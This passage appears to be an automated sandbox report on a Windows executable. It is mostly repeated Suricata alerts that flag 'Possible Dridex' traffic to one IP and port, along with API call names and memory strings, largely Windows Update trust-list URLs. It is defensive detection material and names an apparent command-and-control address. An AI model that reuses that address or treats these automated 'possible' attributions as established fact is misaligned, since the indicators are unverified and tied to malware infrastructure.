          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49764 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49778 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49780 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49781 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49779 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49784 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49774 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49767 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49796 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49813 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49820 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49807 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49836 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49847 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49830 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49853 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49870 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49880 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49887 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49897 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49904 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49927 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49910 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49938 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49864 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49944 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49950 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49961 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49967 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49978 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49990 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49921 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50007 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50029 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50046 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50063 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50080 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50091 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50095 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50093 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50099 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50087 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50103 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50101 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50105 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50107 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50089 -> 89.197.154.116:7810
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50097 -> 89.197.154.116:7810
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: unknownTCP traffic detected without corresponding DNS query: 89.197.154.116
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exeCode function: 0_2_007BE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_007BE68C
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2968344675.0000000003A47000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2696799052.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2745045226.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651363582.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2698625132.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2792724674.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/2
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/?
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/J
          Source: A1E0xfcSNl.exe, 00000000.00000003.2745045226.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841784165.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Lowy
          Source: A1E0xfcSNl.exe, 00000000.00000003.2891272705.0000000003A06000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2889324959.0000000003A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low~
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/N
          Source: A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Q
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Y
          Source: A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Z
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/f
          Source: A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/i
          Source: A1E0xfcSNl.exe, 00000000.00000003.2841784165.00000000039FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msd
          Source: A1E0xfcSNl.exe, 00000000.00000003.2613338606.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2616187536.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2614484255.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625609224.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615740912.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625562236.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625686592.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615920623.00000000039F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trust5
          Source: A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/a
          Source: A1E0xfcSNl.exe, 00000000.00000003.2805877584.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2575782822.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625562236.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625686592.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2638500805.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615920623.00000000039F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11987e592cac6
          Source: A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2721210841.00000000039FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1bd4e0020130a
          Source: A1E0xfcSNl.exe, 00000000.00000003.2662905991.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637546484.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651175055.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625402864.0000000003A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1c7bb69fbb7ef
          Source: A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?206335be2112e
          Source: A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2889324959.0000000003A1A000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903844664.0000000003A1A000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?379de8c2583ed
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673851598.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674815841.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674540264.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674943880.00000000039F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3ceef9ea5f336
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3dd6a9b033069
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?49417627e635c
          Source: A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69c3c58cd8d4e
          Source: A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7fe4746b978ee
          Source: A1E0xfcSNl.exe, 00000000.00000003.2756572032.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9926f10342b95
          Source: A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a6d0c8e63b213
